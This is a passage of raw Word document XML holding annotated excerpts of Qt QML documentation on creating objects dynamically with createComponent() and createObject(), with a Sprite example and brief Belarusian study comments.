          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>non-graphical object (i.e. of the</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId84" w:history="1">
        <w:r w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QtObject</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>or C++</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId85" w:history="1">
        <w:r w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QObject</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Only graphical objects with graphical parent objects will be rendered to the</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId86" w:history="1">
        <w:r w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt Quick</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>visual canvas</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. If you wish to set the parent later you can safely pass</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>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to this function.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B75CF6" w:rsidRPr="00D815C8" w:rsidRDefault="00B75CF6" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The second is optional and is a map of property-value pairs that define initial any property values for the object. Property values specified by this argument are applied to the object before its creation is finalized, avoiding binding errors that may occur if particular properties must be initialized to enable other property bindings. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Additionally, there are small performance benefits when compared to defining property values and bindings after the object is created.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE33E3" w:rsidRPr="00D815C8" w:rsidRDefault="00BE33E3" w:rsidP="00F15C30">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007D0FF1" w:rsidRPr="00D815C8" w:rsidRDefault="007D0FF1" w:rsidP="007D0FF1">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Here is an </w:t>
      </w:r>
      <w:r w:rsidRPr="00250096">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. First there is</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Sprite.qml</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, which defines a simple QML component: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import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QtQuick</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2.0</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D0FF1" w:rsidRPr="00D815C8" w:rsidRDefault="007D0FF1" w:rsidP="007D0FF1">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Rectangle</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width</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80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height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50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color</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"red"</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Our main application file,</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main.qml</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, imports a</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componentCreation.js</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>JavaScript file that will create</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Sprite</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>objects:</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import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QtQuick</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2.0</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import</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"componentCreation.js"</w:t>
      </w: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as</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MyScript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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Rectangle</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id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appWindow</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width</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300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height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300</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Component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onCompleted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MyScript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createSpriteObjects</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Fonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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Here is</w:t>
      </w:r>
      <w:r w:rsidR="00250096">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>componentCreation.js</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Notice it checks whether the component</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId87" w:anchor="status-prop" w:history="1">
        <w:r w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>status</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is</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Component.Ready</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>before calling</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId88" w:anchor="createObject-method" w:history="1">
        <w:r w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>createObject()</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>in case the QML file is loaded over a network and thus is not ready immediately.</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var</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> component</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var</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> sprite</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function</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> createSpriteObjects</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component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createComponent</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"Sprite.qml"</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if</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component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status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Component</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Ready</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finishCreation</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else</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component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statusChanged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connect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finishCreation</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function</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> finishCreation</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if</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component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status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Component</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Ready</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sprite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component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createObject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appWindow</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"x"</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100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"y"</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100</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if</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sprite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null</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com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// Error Handling</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console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log</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"Error creating object"</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else</w:t>
      </w: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if</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component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status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Component</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Error</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com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// Error Handling</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console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log</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"Error loading component:"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component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errorString</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Fonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE33E3" w:rsidRPr="00D815C8" w:rsidRDefault="007D0FF1" w:rsidP="00F15C30">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>З прыклада цудоўна бачна, чаму ў сецевых прылажэннях спачатку важна счытаць, а ўжо потым толькі ствараць нешта.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D0FF1" w:rsidRPr="00D815C8" w:rsidRDefault="007D0FF1" w:rsidP="007D0FF1">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If you are certain the QML file to be loaded is a local file, you could omit the</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finishCreation()</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>function and call</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId89" w:anchor="createObject-method" w:history="1">
        <w:r w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>createObject()</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>immediately:</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function</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> createSpriteObjects</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component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createComponent</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"Sprite.qml"</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sprite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component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createObject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appWindow</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"x"</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100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"y"</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100</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if</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sprite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null</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com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// Error Handling</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console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log</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"Error creating object"</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7D0FF1" w:rsidRPr="00D815C8" w:rsidRDefault="007D0FF1" w:rsidP="007D0FF1">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE33E3" w:rsidRPr="00D815C8" w:rsidRDefault="007D0FF1" w:rsidP="00F15C30">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
